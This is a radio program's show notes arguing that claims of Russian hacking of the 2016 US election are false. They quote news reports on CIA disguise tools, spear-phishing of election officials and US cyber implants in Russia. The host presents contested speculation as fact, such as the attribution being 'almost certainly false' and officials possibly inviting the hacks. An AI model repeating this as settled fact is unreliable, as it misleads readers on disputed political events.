WFMU-FM is podcasting For The Record–You can subscribe to the podcast HERE.
You can subscribe to e‑mail alerts from Spitfirelist.com HERE.
You can subscribe to RSS feed from Spitfirelist.com HERE.
You can subscribe to the comments made on programs and posts–an excellent source of information in, and of, itself HERE.
This broadcast was recorded in one, 60-minute segment.
Introduction: As we have noted in many previous broadcasts and posts, cyber attacks are easily disguised. Perpetrating a “cyber false flag” operation is disturbingly easy to do.
This is of paramount significance in evaluating the increasingly neo-McCarthyite New Cold War propaganda about “Russian interference” in the U.S. election.
Compounding the situation are some recent disclosures and developments:
- We learn that the CIA’s hacking tools are specifically crafted to mask CIA authorship of the attacks. Most significantly, for our purposes, is the fact that the Agency’s hacking tools are engineered in such a way as to permit the authors of the event to represent themselves as Russian.
- The NSA’s elite hacking technology has been made widely available to the hacking community, courtesy of “The Shadow Brokers.”
- During the 2016 Presidential campaign, Michael Flynn was professionally involved with numerous cyber-security and cyber arms manufacturing firms: “ . . . . The month before Flynn joined the advisory board of OSY Technologies, NSO Group opened up a new arm called WestBridge Technologies, Inc., in the D.C. region. (The company was originally registered in Delaware in 2014, but formed in Maryland in April 2016.) Led by NSO Group co-founder Lavie, WestBridge is vying for federal government contracts for NSO Group’s products. Hiring Flynn would provide NSO Group with a well-connected figure in Washington, to help get its foot in the door of the notoriously insular world of secret intelligence budgeting. . . .When you’re trying to build up your business, you need someone who has connections, someone who is seen as an authority and a legitimate presence,” Johnson said. Hiring someone with Flynn’s background in intelligence would ‘open up doors that they wouldn’t have had access to,’ Johnson said.Throughout 2016, Flynn worked for a number of cybersecurity firms personally and through his consulting firm, Flynn Intel Group. In addition to his advisory board seat at OSY Technologies, he sat on the board of Adobe Systems, a large software company with Pentagon contracts, and the boards of the cybersecurity companies GreenZone Systems and HALO Privacy. (Though Flynn described himself as an Adobe advisory board member in his financial disclosure paperwork, the group said in a statement that he provided only “periodic counsel to Adobe’s public sector team.”) . . .”
- NSO Group and OSY Technologies specialize in spear-fishing attacks, one of the methodologies used in the hacks of U.S. election computers. Is there any link between Flynn’s cyber-security/cyber arms links and the high-profile hacks during the campaign?
- A GOP tech database–Deep Root–Exposed the data of almost two hundred million American voters to widespread scrutiny. Is there any connection between Deep Root, the GOP and the alleged Russian hacking of U.S. voting computers?
Following a Bloomberg report about widespread Russian hacking of American elections systems: “ . . . . Kay Stimson, spokeswoman for the National Association of Secretaries of State, said the members of her group — which represents the chief election officials in 40 states — were taken aback by the allegation that 39 states were hacked. ‘We cannot verify any information in that report,’ Stimson told Benzinga. “It has some claims that have raised some red flags. I don’t know where they’re getting it. We’re not able to assess to the credibility.’ She said that some cybersecurity firms were engaging in scare tactics at the state and local levels. ‘There are cybersecurity firms making some wild claims,’ she said. ‘It is a very aggressive industry.’ . . .”
With the high-profile hacks being attributed–almost certainly falsely–to Russia, there are ominous developments taking place that may well lead to a Third World War. During the closing days of his Presidency, Obama authorized the planting of cyber weapons on Russian computer networks. Obama did this after talking with Putin on the Hot Line, established to prevent a Third World War. Putin denied interfering in the U.S. election.
The conclusion that Russia hacked the U.S. election on Putin’s orders appears to have been based on a CIA source in the Kremlin. Even when that intelligence was delivered, other agencies weren’t ready to accept the CIA’s conclusion and it took intelligence from another nation (not named) to provide the final intelligence tipping point that led to a broad-based conclusion the not only was the Russian government behind the cyberattacks but that Vladimir Putin himself ordered it.
That ally’s intelligence is described as “the most critical technical intelligence on Russia,” however the NSA still wasn’t convinced based on what sounds like a lack of confidence in that source. Thus, it looks like a CIA Kremlin source and an unnamed foreign intelligence agency with questionable credentials are the basis of what appears to be a likely future full-scale US/Russian cyberwar.
Of paramount significance is the fact that IF, on Putin’s orders (and we are to believe such) Russia continued to hack U.S. computer systems to influence the election, Putin would have to have gone utterly mad. Those hacks would have precluded any rapprochement between Russia and the United States under a President Trump. There is not indication that Putin went off the deep end.
Also auguring a Third World War are two developments in Syria. Seymour Hersh published an article in Die Welt revealing that, not only was the April 4 alleged Sarin attack NOT a chemical weapons attack but there was widespread knowledge of this in American military and intelligence circles.
Ominously, the Trump White House is claiming they have advance knowledge of an impending Syrian chemical weapons strike and will punish Syria heavily, and hold Russia accountable.
Program Highlights Include: The fact that the bulk of activity detected by the DHS on U.S. election systems was “scanning”–standard operating procedure for hacking; a former NSA hacking specialist–Jake Williams–said that spear-phishing operation was of “medium sophistication” that “practically any hacker can pull off”; the question of whether or not GOP Secretaries of State might have deliberately responded to the spear-phishing e‑mails that permitted the “hit” on U.S. election systems; the Russian authorization of the use by the Syrian air force of a smart bomb to eliminate Al-Qaeda-linked jihadists; the release of a chemical cloud as a result of that strike that was caused by secondary explosions; Cambridge Analytica’s hiring of GOP online data-basing kingpin Darren Bolding.
1a. As we have noted in many previous broadcasts and posts, cyber attacks are easily disguised. Perpetrating a “cyber false flag” operation is disturbingly easy to do. In a world where the verifiably false and physically impossible “controlled demolition”/Truther nonsense has gained traction, cyber false flag ops are all the more threatening and sinister.
Now, we learn that the CIA’s hacking tools are specifically crafted to mask CIA authorship of the attacks. Most significantly, for our purposes, is the fact that the Agency’s hacking tools are engineered in such a way as to permit the authors of the event to represent themselves as Russian.
This is of paramount significance in evaluating the increasingly neo-McCarthyite New Cold War propaganda about “Russian interference” in the U.S. election.
This morning, WikiLeaks released part 3 of its Vault 7 series, called Marble. Marble reveals CIA source code files along with decoy languages that might disguise viruses, trojans, and hacking attacks. These tools could make it more difficult for anti-virus companies and forensic investigators to attribute hacks to the CIA. Could this call the source of previous hacks into question? It appears that yes, this might be used to disguise the CIA’s own hacks to appear as if they were Russian, Chinese, or from specific other countries. These tools were in use in 2016, WikiLeaks reported.
It’s not known exactly how this Marble tool was actually used. However, according to WikiLeaks, the tool could make it more difficult for investigators and anti-virus companies to attribute viruses and other hacking tools to the CIA. Test examples weren’t just in English, but also Russian, Chinese, Korean, Arabic, and Farsi. This might allow a malware creator to not only look like they were speaking in Russian or Chinese, rather than in English, but to also look like they tried to hide that they were not speaking English, according to WikiLeaks. This might also hide fake error messages or be used for other purposes. . . .
1b. There has been a widely-circulated report about how the election systems of 39 US states were “hit” by ‘Russian hackers’, most of them just a week, before the 2016 November election? Well, the National Association of Secretaries of State, an organization that represents the chief election officials in 40 states, has a rebuttal: They have no idea what this report was talking about and believe it’s a matter of cybersecurity firms being overly aggressive to earn state contracts to protect election systems.
Again, quite a rebuttal–they have no idea what the Bloomberg report was saying: “ . . . . Kay Stimson, spokeswoman for the National Association of Secretaries of State, said the members of her group — which represents the chief election officials in 40 states — were taken aback by the allegation that 39 states were hacked.
‘We cannot verify any information in that report,’ Stimson told Benzinga. “It has some claims that have raised some red flags. I don’t know where they’re getting it. We’re not able to assess to the credibility.’
Ms. Stimson also noted that cyber security firms appeared to be ramping up the hype in order to further their own commercial agendas.
” . . . Cyber Security Firms Capitalizing On Russian Scare
She said that some cybersecurity firms were engaging in scare tactics at the state and local levels.
‘There are cybersecurity firms making some wild claims,’ she said. ‘It is a very aggressive industry.’
In addition the Department of Homeland Security is also downplaying the significance of the report:
” . . . . Bloomberg attributed the number of states “hit” — Stimson questioned the meaning of the word — to the systems in 39 states. “It’s hard to say how they ‘hit’ 39 states,” she said.
Homeland Security also issued a report about the Bloomberg report, saying: ‘While we are not going to get into specifics of activity at the state level, the vast majority of what we saw was scanning — not attempts to intrude — and unsuccessful attempts to steal data held in voter registration databases.’. . . .”
State election officials are baffled by a Bloomberg report alleging that Russian hackers compromised the voting systems in 39 states, adding that cybersecurity firms were engaging in scare tactics to win state and local contracts to protect election systems.
The June 13 Bloomberg story said that hackers staged incursions last year into voter databases and software systems in almost twice as many states as previously reported.
“In Illinois, investigators found evidence that cyber intruders tried to delete or alter voter data. The hackers accessed software designed to be used by poll workers on Election Day, and in at least one state accessed a campaign finance database,” the report said.
It cited three unnamed sources with direct knowledge of “the U.S. investigation into the matter.”
“In all, the Russian hackers hit systems in a total of 39 states, one of them said,” the report said.
The National Security Agency, the FBI and the U.S. Homeland Security Department all are looking into various aspects of what intelligence officials said was Russian meddling into the U.S. election systems.
Kay Stimson, spokeswoman for the National Association of Secretaries of State, said the members of her group — which represents the chief election officials in 40 states — were taken aback by the allegation that 39 states were hacked.
“We cannot verify any information in that report,” Stimson told Benzinga. “It has some claims that have raised some red flags. I don’t know where they’re getting it. We’re not able to assess to the credibility.”
Cyber Security Firms Capitalizing On Russian Scare
She said that some cybersecurity firms were engaging in scare tactics at the state and local levels.
“There are cybersecurity firms making some wild claims,” she said. “It is a very aggressive industry.”
Bloomberg attributed the number of states “hit” — Stimson questioned the meaning of the word — to the systems in 39 states. “It’s hard to say how they ‘hit’ 39 states,” she said.
Homeland Security also issued a report about the Bloomberg report, saying: “While we are not going to get into specifics of activity at the state level, the vast majority of what we saw was scanning — not attempts to intrude — and unsuccessful attempts to steal data held in voter registration databases.”
Little Doubt Russian Meddling In Election
Despite the reaction to the Bloomberg report, there is little doubt that Russian actors attempted to access U.S. election systems. Special investigator Robert Mueller has been tasked with spearheading the investigation into whether the Trump campaign colluded with Kremlin affiliates to leak damaging emails and rig the election.
…
2a. The information presented above certainly supports the notion that the “39 states were hacked by the Russians” was, at a minimum, an exaggeration. And when DHS talks about the “vast majority” of what they saw was “scanning”, keep in mind that “scanning” computers connected to the internet is ubiquitous and if they were using IP addresses to attribute this scanning to “Russian hackers”, if the US intelligence report on the evidence for ‘Russian hackers’ in the DNC server hack is any indication of the way IP addresses are being used to assess culpability for these state system scanning attempts, IP addresses aren’t the most compelling evidence in this case:
“Did the Russians Really Hack the DNC?” by Gregory Elich; Counter Punch; 1/13/2017.
Russia, we are told, breached the servers of the Democratic National Committee (DNC), swiped emails and other documents, and released them to the public, to alter the outcome of the U.S. presidential election.
How substantial is the evidence backing these assertions?
…
Command-and-control servers remotely issue malicious commands to infected machines. Oddly, for such a key component of the operation, the command-and-control IP address in both attacks was hard-coded in the malware. This seems like another inexplicable choice, given that the point of an advanced persistent threat is to operate for an extended period without detection. A more suitable approach would be to use a Domain Name System (DNS) address, which is a decentralized computer naming system. That would provide a more covert means of identifying the command-and-control server. [13] Moreover, one would expect that address to be encrypted. Using a DNS address would also allow the command-and-control operation to easily move to another server if its location is detected, without the need to modify and reinstall the code.
One of the IP addresses is claimed to be a “well-known APT 28” command-and-control address, while the second is said to be linked to Russian military intelligence. [14] The first address points to a server located in San Jose, California, and is operated by a server hosting service. [15] The second server is situated in Paris, France, and owned by another server hosting service. [16] Clearly, these are servers that have been compromised by hackers. It is customary for hackers to route their attacks through vulnerable computers. The IP addresses of compromised computers are widely available on the Deep Web, and typically a hacked server will be used by multiple threat actors. These two particular servers may or may not have been regularly utilized by Russian Intelligence, but they were not uniquely so used. Almost certainly, many other hackers would have used the same machines, and it cannot be said that these IP addresses uniquely identify an infiltrator. Indeed, the second IP address is associated with the common Trojan viruses Agent-APPR and Shunnael.[17]
“Everyone is focused on attribution, but we may be missing the bigger truth,” says Joshua Croman, Director of the Cyber Statecraft Initiative at the Atlantic Council. “[T]he level of sophistication required to do this hack was so low that nearly anyone could do it.” [18] . . .
2b. Since digital “signatures” are easily spoofed by hackers and a declaration of cyber war would be an insane move by the Russian government, there’s the very obvious possibility that someone else made all these hacking attempts.
It’s worth noting that in The Intercept report about the leaked NSA document showing the analysis of the hacking of a Florida voting systems company, the article features an interview Jake Williams – a former member of NSA’s elite hacking Tailored Access Operations team – and ask him about the spear-phishing campaign used against those 122 officials in the last week of the campaign. According to Williams, that spear-phishing operation was of “medium sophistication” that “practically any hacker can pull off”.
The spear-phishing attacks used documents from the Florida-based “VR Systems” as the bait. That’s what the alleged Russian hackers did in the last week of the campaign. And how sophisticated was this spear-phishing attack? Almost any hacker could have done it.
“. . . . According to Williams, if this type of attack were successful, the perpetrator would possess “unlimited” capacity for siphoning away items of interest. ‘Once the user opens up that email [attachment],’ Williams explained, ‘the attacker has all the same capabilities that the user does.’ Vikram Thakur, a senior research manager at Symantec’s Security Response Team, told The Intercept that in cases like this the ‘quantity of exfiltrated data is only limited by the controls put in place by network administrators.’ Data theft of this variety is typically encrypted, meaning anyone observing an infected network wouldn’t be able to see what exactly was being removed but should certainly be able to tell something was afoot, Williams added. Overall, the method is one of ‘medium sophistication,’ Williams said, one that ‘practically any hacker can pull off.’. . . .”
…
So according to federal investigators, ‘the GRU’ used a spear-phishing technique that any hacker could have pulled off, and did it in a manner that left digital “signatures”, like IP address, that apparently led back to the GRU. The culprits also kept the same digital signatures in the July 2016 hack on the Illinois voting system that were found in the wave of spear-phishing attacks in the last week of the campaign. Even after getting a “cyber Red Phone” call from the White House in for the first time ever in October, thus opening Russia to potential revenge attacks for years to come and poison-pilling the possible utility of having a Russian-friendly President Trump in the White House. It’s as if the cost-benefit analysis didn’t factor in the costs. That’s the story we’re supposed to accept.
And, amazingly, based on the first report, it sounds the bulk of the 39 hacked states got hacked by this spear-phishing campaign in the last week of the campaign despite the intense focus around potential hacking in the prior months. Those must have been some pretty compelling phishing emails.
It raises the question as to whether or not some of the those 122 targeted officials were trying to get their systems hacked. Keep in mind one of the very interesting things about a spear-phishing attack in a scenario like this: one of the hacked parties (the GOP) just might want to get hacked: Spear-phishing a great way for an insider to invite in a hacker while maintaining plausible deniability. Oops! I was tricked!)
Russian military intelligence executed a cyberattack on at least one U.S. voting software supplier and sent spear-phishing emails to more than 100 local election officials just days before last November’s presidential election, according to a highly classified intelligence report obtained by The Intercept.
The top-secret National Security Agency document, which was provided anonymously to The Intercept and independently authenticated, analyzes intelligence very recently acquired by the agency about a months-long Russian intelligence cyber effort against elements of the U.S. election and voting infrastructure. The report, dated May 5, 2017, is the most detailed U.S. government account of Russian interference in the election that has yet come to light.
While the document provides a rare window into the NSA’s understanding of the mechanics of Russian hacking, it does not show the underlying “raw” intelligence on which the analysis is based. A U.S. intelligence officer who declined to be identified cautioned against drawing too big a conclusion from the document because a single analysis is not necessarily definitive.
The report indicates that Russian hacking may have penetrated further into U.S. voting systems than was previously understood. It states unequivocally in its summary statement that it was Russian military intelligence, specifically the Russian General Staff Main Intelligence Directorate, or GRU, that conducted the cyber attacks described in the document:
Russian General Staff Main Intelligence Directorate actors … executed cyber espionage operations against a named U.S. company in August 2016, evidently to obtain information on elections-related software and hardware solutions. … The actors likely used data obtained from that operation to … launch a voter registration-themed spear-phishing campaign targeting U.S. local government organizations.
This NSA summary judgment is sharply at odds with Russian President Vladimir Putin’s denial last week that Russia had interfered in foreign elections: “We never engaged in that on a state level, and have no intention of doing so.” Putin, who had previously issued blanket denials that any such Russian meddling occurred, for the first time floated the possibility that freelance Russian hackers with “patriotic leanings” may have been responsible. The NSA report, on the contrary, displays no doubt that the cyber assault was carried out by the GRU.
…
The Spear-Phishing Attack
As described by the classified NSA report, the Russian plan was simple: pose as an e‑voting vendor and trick local government employees into opening Microsoft Word documents invisibly tainted with potent malware that could give hackers full control over the infected computers.
But in order to dupe the local officials, the hackers needed access to an election software vendor’s internal systems to put together a convincing disguise. So on August 24, 2016, the Russian hackers sent spoofed emails purporting to be from Google to employees of an unnamed U.S. election software company, according to the NSA report. Although the document does not directly identify the company in question, it contains references to a product made by VR Systems, a Florida-based vendor of electronic voting services and equipment whose products are used in eight states.
The spear-phishing email contained a link directing the employees to a malicious, faux-Google website that would request their login credentials and then hand them over to the hackers. The NSA identified seven “potential victims” at the company. While malicious emails targeting three of the potential victims were rejected by an email server, at least one of the employee accounts was likely compromised, the agency concluded. The NSA notes in its report that it is “unknown whether the aforementioned spear-phishing deployment successfully compromised all the intended victims, and what potential data from the victim could have been exfiltrated.”
VR Systems declined to respond to a request for comment on the specific hacking operation outlined in the NSA document. Chief Operating Officer Ben Martin replied by email to The Intercept’s request for comment with the following statement:
Phishing and spear-phishing are not uncommon in our industry. We regularly participate in cyber alliances with state officials and members of the law enforcement community in an effort to address these types of threats. We have policies and procedures in effect to protect our customers and our company.
Although the NSA report indicates that VR Systems was targeted only with login-stealing trickery, rather than computer-controlling malware, this isn’t necessarily a reassuring sign. Jake Williams, founder of computer security firm Rendition Infosec and formerly of the NSA’s Tailored Access Operations hacking team, said stolen logins can be even more dangerous than an infected computer. “I’ll take credentials most days over malware,” he said, since an employee’s login information can be used to penetrate “corporate VPNs, email, or cloud services,” allowing access to internal corporate data. The risk is particularly heightened given how common it is to use the same password for multiple services. Phishing, as the name implies, doesn’t require everyone to take the bait in order to be a success — though Williams stressed that hackers “never want just one” set of stolen credentials.
In any event, the hackers apparently got what they needed. Two months later, on October 27, they set up an “operational” Gmail account designed to appear as if it belonged to an employee at VR Systems, and used documents obtained from the previous operation to launch a second spear-phishing operation “targeting U.S. local government organizations.” These emails contained a Microsoft Word document that had been “trojanized” so that when it was opened it would send out a beacon to the “malicious infrastructure” set up by the hackers.
The NSA assessed that this phase of the spear-fishing operation was likely launched on either October 31 or November 1 and sent spear-fishing emails to 122 email addresses “associated with named local government organizations,” probably to officials “involved in the management of voter registration systems.” The emails contained Microsoft Word attachments purporting to be benign documentation for VR Systems’ EViD voter database product line, but which were in reality maliciously embedded with automated software commands that are triggered instantly and invisibly when the user opens the document. These particular weaponized files used PowerShell, a Microsoft scripting language designed for system administrators and installed by default on Windows computers, allowing vast control over a system’s settings and functions. If opened, the files “very likely” would have instructed the infected computer to begin downloading in the background a second package of malware from a remote server also controlled by the hackers, which the secret report says could have provided attackers with “persistent access” to the computer or the ability to “survey the victims for items of interest.” Essentially, the weaponized Word document quietly unlocks and opens a target’s back door, allowing virtually any cocktail of malware to be subsequently delivered automatically.
According to Williams, if this type of attack were successful, the perpetrator would possess “unlimited” capacity for siphoning away items of interest. “Once the user opens up that email [attachment],” Williams explained, “the attacker has all the same capabilities that the user does.” Vikram Thakur, a senior research manager at Symantec’s Security Response Team, told The Intercept that in cases like this the “quantity of exfiltrated data is only limited by the controls put in place by network administrators.” Data theft of this variety is typically encrypted, meaning anyone observing an infected network wouldn’t be able to see what exactly was being removed but should certainly be able to tell something was afoot, Williams added.Overall, the method is one of “medium sophistication,” Williams said, one that “practically any hacker can pull off.”
The NSA, however, is uncertain about the results of the attack, according to the report. “It is unknown,” the NSA notes, “whether the aforementioned spear-phishing deployment successfully compromised the intended victims, and what potential data could have been accessed by the cyber actor.” . . . .
3. The conclusion that Russia hacked the U.S. election on Putin’s orders appears to have been based on a CIA source in the Kremlin. Even when that intelligence was delivered, other agencies weren’t ready to accept the CIA’s conclusion and it took intelligence from another nation (not named) to provide the final intelligence tipping point that led to a broad-based conclusion the not only was the Russian government behind the cyberattacks but that Vladimir Putin himself ordered it.
That ally’s intelligence is described as “the most critical technical intelligence on Russia,” however the NSA still wasn’t convinced based on what sounds like a lack of confidence in that source. Thus, it looks like a CIA Kremlin source and an unnamed foreign intelligence agency with questionable credentials are the basis of what appears to be a likely future full-scale US/Russian cyberwar.
” . . . .Inside was an intelligence bombshell, a report drawn from sourcing deep inside the Russian government that detailed Russian President Vladimir Putin’s direct involvement in a cyber campaign to disrupt and discredit the U.S. presidential race. . . .”
We are told that a CIA deep Russian government source is the primary source of the ‘Putin ordered it’ conclusion. Well, at least that’s better than the bad joke technical evidence that’s been provided thus far. But even that source’s claims apparently weren’t enough to convinced other parts of the intelligence community. It took the intelligence from the unnamed ally to do that:
” . . . . But it went further. The intelligence captured Putin’s specific instructions on the operation’s audacious objectives — defeat or at least damage the Democratic nominee, Hillary Clinton, and help elect her opponent, Donald Trump.
At that point, the outlines of the Russian assault on the U.S. election were increasingly apparent. Hackers with ties to Russian intelligence services had been rummaging through Democratic Party computer networks, as well as some Republican systems, for more than a year. In July, the FBI had opened an investigation of contacts between Russian officials and Trump associates. And on July 22, nearly 20,000 emails stolen from the Democratic National Committee were dumped online by WikiLeaks.
But at the highest levels of government, among those responsible for managing the crisis, the first moment of true foreboding about Russia’s intentions arrived with that CIA intelligence.
…
It took time for other parts of the intelligence community to endorse the CIA’s view. Only in the administration’s final weeks in office did it tell the public, in a declassified report, what officials had learned from Brennan in August — that Putin was working to elect Trump.
…
Despite the intelligence the CIA had produced, other agencies were slower to endorse a conclusion that Putin was personally directing the operation and wanted to help Trump. “It was definitely compelling, but it was not definitive,” said one senior administration official. “We needed more.”
Some of the most critical technical intelligence on Russia came from another country, officials said. Because of the source of the material, the NSA was reluctant to view it with high confidence. . . .
. . . . In a subsequent news conference, Obama alluded to the exchange and issued a veiled threat. “We’re moving into a new era here where a number of countries have significant capacities,” he said. “Frankly, we’ve got more capacity than anybody both offensively and defensively.” . . . .
. . . . Then, on Oct. 31, the administration delivered a final pre-election message via a secure channel to Moscow originally created to avert a nuclear exchange. The message noted that the United States had detected malicious activity, originating from servers in Russia, targeting U.S. election systems and warned that meddling would be regarded as unacceptable interference. Russia confirmed the next day that it had received the message but replied only after the election through the same channel, denying the accusation. . . .
. . . .But Obama also signed the secret finding, officials said, authorizing a new covert program involving the NSA, CIA and U.S. Cyber Command. . . .
. . . . .The cyber operation is still in its early stages and involves deploying “implants” in Russian networks deemed “important to the adversary and that would cause them pain and discomfort if they were disrupted,” a former U.S. official said.
The implants were developed by the NSA and designed so that they could be triggered remotely as part of retaliatory cyber-strike in the face of Russian aggression, whether an attack on a power grid or interference in a future presidential race.
Officials familiar with the measures said that there was concern among some in the administration that the damage caused by the implants could be difficult to contain.
As a result, the administration requested a legal review, which concluded that the devices could be controlled well enough that their deployment would be considered “proportional” in varying scenarios of Russian provocation, a requirement under international law.
The operation was described as long-term, taking months to position the implants and requiring maintenance thereafter. Under the rules of covert action, Obama’s signature was all that was necessary to set the operation in motion.
U.S. intelligence agencies do not need further approval from Trump, and officials said that he would have to issue a countermanding order to stop it. The officials said that they have seen no indication that Trump has done so. . . .”
Keep in mind that such a response from the US would be entirely predictable if the Russian government really did order this hack. Russia would be at a heightened risk for years or decades to come if Putin really did order this attack. There’s no reason to assume that the Russian government wouldn’t be well aware of this consequence.
So if Putin really did order this hack he would have to have gone insane. That’s how stupid this attack was if Putin actually ordered it. According to a CIA spy in the Kremlin, along with a questionable foreign ally, that’s exactly what Putin did.
He apparently went insane and preemptively launched a cyberwar knowing full well how devastating the long-term consequences could be. Because he really, really, really hates Hillary. That’s the narrative we’re being given.
And now, any future attacks on US elections or the US electrical grid that can somehow be pinned on the Russians is going to trigger some sort of painful wave or retaliatory cyberbombs. Which, of course, will likely trigger a way of counter-retaliatory cyberbombs in the US. And a full-scale cyberwar will be born and we’ll just have to hope it stays in the cyber domain. That’s were we are now based on a CIA spy in the Kremlin and an unnamed foreign intelligence agency
Early last August, an envelope with extraordinary handling restrictions arrived at the White House. Sent by courier from the CIA, it carried “eyes only” instructions that its contents be shown to just four people: President Barack Obama and three senior aides.
Inside was an intelligence bombshell, a report drawn from sourcing deep inside the Russian government that detailed Russian President Vladimir Putin’s direct involvement in a cyber campaign to disrupt and discredit the U.S. presidential race.
But it went further. The intelligence captured Putin’s specific instructions on the operation’s audacious objectives — defeat or at least damage the Democratic nominee, Hillary Clinton, and help elect her opponent, Donald Trump.
At that point, the outlines of the Russian assault on the U.S. election were increasingly apparent. Hackers with ties to Russian intelligence services had been rummaging through Democratic Party computer networks, as well as some Republican systems, for more than a year. In July, the FBI had opened an investigation of contacts between Russian officials and Trump associates. And on July 22, nearly 20,000 emails stolen from the Democratic National Committee were dumped online by WikiLeaks.
But at the highest levels of government, among those responsible for managing the crisis, the first moment of true foreboding about Russia’s intentions arrived with that CIA intelligence.
The material was so sensitive that CIA Director John Brennan kept it out of the President’s Daily Brief, concerned that even that restricted report’s distribution was too broad. The CIA package came with instructions that it be returned immediately after it was read. To guard against leaks, subsequent meetings in the Situation Room followed the same protocols as planning sessions for the Osama bin Laden raid.
It took time for other parts of the intelligence community to endorse the CIA’s view. Only in the administration’s final weeks in office did it tell the public, in a declassified report, what officials had learned from Brennan in August — that Putin was working to elect Trump.
Over that five-month interval, the Obama administration secretly debated dozens of options for deterring or punishing Russia, including cyberattacks on Russian infrastructure, the release of CIA-gathered material that might embarrass Putin and sanctions that officials said could “crater” the Russian economy.
But in the end, in late December, Obama approveda modest package combining measures that had been drawn up to punish Russia for other issues — expulsions of 35 diplomats and the closure of two Russian compounds — with economic sanctions so narrowly targeted that even those who helped design them describe their impact as largely symbolic.
Obama also approved a previously undisclosed covert measure that authorized planting cyber weapons in Russia’s infrastructure, the digital equivalent of bombs that could be detonated if the United States found itself in an escalating exchange with Moscow. The project, which Obama approved in a covert-action finding, was still in its planning stages when Obama left office. It would be up to President Trump to decide whether to use the capability.
In political terms, Russia’s interference was the crime of the century, an unprecedented and largely successful destabilizing attack on American democracy. It was a case that took almost no time to solve, traced to the Kremlin through cyber-forensics and intelligence on Putin’s involvement. And yet, because of the divergent ways Obama and Trump have handled the matter, Moscow appears unlikely to face proportionate consequences.
Those closest to Obama defend the administration’s response to Russia’s meddling. They note that by August it was too late to prevent the transfer to WikiLeaks and other groups of the troves of emails that would spill out in the ensuing months. They believe that a series of warnings — including one that Obama delivered to Putin in September — prompted Moscow to abandon any plans of further aggression, such as sabotage of U.S. voting systems.
Denis McDonough, who served as Obama’s chief of staff, said that the administration regarded Russia’s interference as an attack on the “heart of our system.”
“We set out from a first-order principle that required us to defend the integrity of the vote,” McDonough said in an interview. “Importantly, we did that. It’s also important to establish what happened and what they attempted to do so as to ensure that we take the steps necessary to stop it from happening again.”
But other administration officials look back on the Russia period with remorse.
“It is the hardest thing about my entire time in government to defend,” said a former senior Obama administration official involved in White House deliberations on Russia. “I feel like we sort of choked.”
…
This account of the Obama administration’s response to Russia’s interference is based on interviews with more than three dozen current and former U.S. officials in senior positions in government, including at the White House, the State, Defense and Homeland Security departments, and U.S. intelligence services. Most agreed to speak only on the condition of anonymity, citing the sensitivity of the issue.
The White House, the CIA, the FBI, the National Security Agency and the Office of the Director of National Intelligence declined to comment.
‘Deeply concerned’
The CIA breakthrough came at a stage of the presidential campaign when Trump had secured the GOP nomination but was still regarded as a distant long shot. Clinton held comfortable leads in major polls, and Obama expected that he would be transferring power to someone who had served in his Cabinet.
The intelligence on Putin was extraordinary on multiple levels, including as a feat of espionage.
For spy agencies, gaining insights into the intentions of foreign leaders is among the highest priorities. But Putin is a remarkably elusive target. A former KGB officer, he takes extreme precautions to guard against surveillance, rarely communicating by phone or computer, always running sensitive state business from deep within the confines of the Kremlin.
The Washington Post is withholding some details of the intelligence at the request of the U.S. government.
In early August, Brennan alerted senior White House officials to the Putin intelligence, making a call to deputy national security adviser Avril Haines and pulling national security adviser Susan E. Rice aside after a meeting before briefing Obama along with Rice, Haines and McDonough in the Oval Office.
Officials described the president’s reaction as grave. Obama “was deeply concerned and wanted as much information as fast as possible,” a former official said. “He wanted the entire intelligence community all over this.”
Concerns about Russian interference had gathered throughout the summer.
Russia experts had begun to see a troubling pattern of propaganda in which fictitious news stories, assumed to be generated by Moscow, proliferated across social-media platforms.
Officials at the State Department and FBI became alarmed by an unusual spike in requests from Russia for temporary visas for officials with technical skills seeking permission to enter the United States for short-term assignments at Russian facilities. At the FBI’s behest, the State Department delayed approving the visas until after the election.
Meanwhile, the FBI was tracking a flurry of hacking activity against U.S. political parties, think tanks and other targets. Russia had gained entry to DNC systems in the summer of 2015 and spring of 2016, but the breaches did not become public until they were disclosed in a June 2016 report by The Post.
Even after the late-July WikiLeaks dump, which came on the eve of the Democratic convention and led to the resignation of Rep. Debbie Wasserman Schultz (D‑Fla.) as the DNC’s chairwoman, U.S. intelligence officials continued to express uncertainty about who was behind the hacks or why they were carried out.
At a public security conference in Aspen, Colo., in late July, Director of National Intelligence James R. Clapper Jr. noted that Russia had a long history of meddling in American elections but that U.S. spy agencies were not ready to “make the call on attribution” for what was happening in 2016.
“We don’t know enough … to ascribe motivation,” Clapper said. “Was this just to stir up trouble or was this ultimately to try to influence an election?”
Brennan convened a secret task force at CIA headquarters composed of several dozen analysts and officers from the CIA, the NSA and the FBI.
The unit functioned as a sealed compartment, its work hidden from the rest of the intelligence community. Those brought in signed new non-disclosure agreements to be granted access to intelligence from all three participating agencies.
They worked exclusively for two groups of “customers,” officials said. The first was Obama and fewer than 14 senior officials in government. The second was a team of operations specialists at the CIA, NSA and FBI who took direction from the task force on where to aim their subsequent efforts to collect more intelligence on Russia.
Don’t make things worse
The secrecy extended into the White House.
Rice, Haines and White House homeland-security adviser Lisa Monaco convened meetings in the Situation Room to weigh the mounting evidence of Russian interference and generate options for how to respond. At first, only four senior security officials were allowed to attend: Brennan, Clapper, Attorney General Loretta E. Lynch and FBI Director James B. Comey. Aides ordinarily allowed entry as “plus-ones” were barred.
Gradually, the circle widened to include Vice President Biden and others. Agendas sent to Cabinet secretaries — including John F. Kerry at the State Department and Ashton B. Carter at the Pentagon — arrived in envelopes that subordinates were not supposed to open. Sometimes the agendas were withheld until participants had taken their seats in the Situation Room.
Throughout his presidency, Obama’s approach to national security challenges was deliberate and cautious. He came into office seeking to end wars in Iraq and Afghanistan. He was loath to act without support from allies overseas and firm political footing at home. He was drawn only reluctantly into foreign crises, such as the civil war in Syria, that presented no clear exit for the United States.
Obama’s approach often seemed reducible to a single imperative: Don’t make things worse. As brazen as the Russian attacks on the election seemed, Obama and his top advisers feared that things could get far worse.
They were concerned that any pre-election response could provoke an escalation from Putin. Moscow’s meddling to that point was seen as deeply concerning but unlikely to materially affect the outcome of the election. Far more worrisome to the Obama team was the prospect of a cyber-assault on voting systems before and on Election Day.
They also worried that any action they took would be perceived as political interference in an already volatile campaign. By August, Trump was predicting that the election would be rigged. Obama officials feared providing fuel to such claims, playing into Russia’s efforts to discredit the outcome and potentially contaminating the expected Clinton triumph.
